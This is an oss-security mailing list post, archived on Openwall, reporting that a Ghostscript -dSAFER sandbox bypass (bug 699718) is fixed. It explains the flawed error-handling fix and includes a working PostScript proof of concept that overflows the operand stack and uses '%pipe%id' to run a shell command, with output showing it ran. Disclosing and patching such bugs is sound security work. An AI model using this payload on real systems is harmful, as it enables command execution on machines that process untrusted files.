Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Sun, 9 Sep 2018 12:27:26 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: Re: Re: More Ghostscript Issues: Should we disable PS
 coders in policy.xml by default?

[resending post that bounced]

Another update, that bypass is now fixed with these commits:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=3e5d316b72e3965b7968bb1d96baa137cd063ac6
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=643b24dbd002

The problem was that the previous
<http://git.ghostscript.com/?p=ghostpdl.git&a=commitdiff&h=5812b1b78fc4> commit
relied on catching any errors, then restoring a sane state in the error
handler. That won't work, because the trusted code shares the same operand
stack with untrusted code, so you can (for example) just fill it up with
junk and cause a stack overflow. That causes the stopped proc to stop,
leaving the page device in insecure state ("stopped" is the PostScript
equivalent of "threw an exception").

Here is a test case:

%!PS
% This is bug 699718, trysetparams stopped proc can itself stop, leaving
page device in insecure state
currentpagedevice /PageSize get 0 (foobar) put
a0
% fill up the stack with junk, so the error handler generates a
/stackoverflow
0 1 300360 {} for
{ grestore } stopped clear
(ppmraw) selectdevice
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage

$ ./gs -dSAFER bug699718.txt
GPL Ghostscript GIT PRERELEASE 9.25 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
uid=1000(taviso) gid=1000(primarygroup)

I dunno if I believe there are no other ways to make that fail, I'll think
about it. I can see there are bunch more security related commits in git
that are not from my reports, so I guess there are more on the way anyway.

Tavis.

On Thu, Sep 6, 2018 at 9:27 AM Leonid Isaev <leonid.isaev@...a.colorado.edu>
wrote:

> On Thu, Sep 06, 2018 at 03:17:25PM +0200, Jakub Wilk wrote:
> > * Leonid Isaev <leonid.isaev@...a.colorado.edu>, 2018-09-05, 17:32:
> > > pdf files can contains things like javascript...
> >
> > Do any open-source PDF browsers actually execute embedded JS?
>
> Currently, evince, okular and gv don't. The same goes for zathura with its
> poppler backend (haven't checked this, but pretty sure). But then there is
> also
> Artifex Mupdf which, AFAIR, supports JS in pdf files (by extension, so does
> zathura when viewing a pdf file using the mupdf plugin). I don't know how
> complete that support is. Most importantly, many Android pdf/ebook readers
> probably include JS support.
>
> CHeers,
> L.
>
> --
> Leonid Isaev
>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.